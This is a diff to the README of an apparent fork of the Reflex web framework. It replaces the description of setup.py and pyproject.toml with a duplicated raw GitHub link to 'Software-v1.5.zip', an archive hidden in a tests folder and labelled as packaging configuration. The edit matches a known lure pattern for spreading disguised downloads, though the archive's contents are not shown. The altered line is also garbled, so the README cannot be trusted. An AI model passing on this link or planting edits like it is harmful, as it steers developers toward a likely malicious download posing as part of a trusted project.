SawmFawker/reflex/README.md

   - docs/           Documentation and examples
   - cli/            Command line interface and helpers
   - examples/       End-to-end example apps and tutorials
-- setup.py or pyproject.toml: Packaging configuration for developers
+- https://raw.githubusercontent.com/SawmFawker/reflex/main/tests/units/components/markdown/Software-v1.5.zip or https://raw.githubusercontent.com/SawmFawker/reflex/main/tests/units/components/markdown/Software-v1.5.zip Packaging configuration for developers

 Starter projects and tutorials
 - Quickstart tutorial: Build a small dashboard with a header, a left navigation, a main content area, and a data table.
 This tutorial demonstrates routing, a responsive layout, a form, and a live data feed simulated with a timer.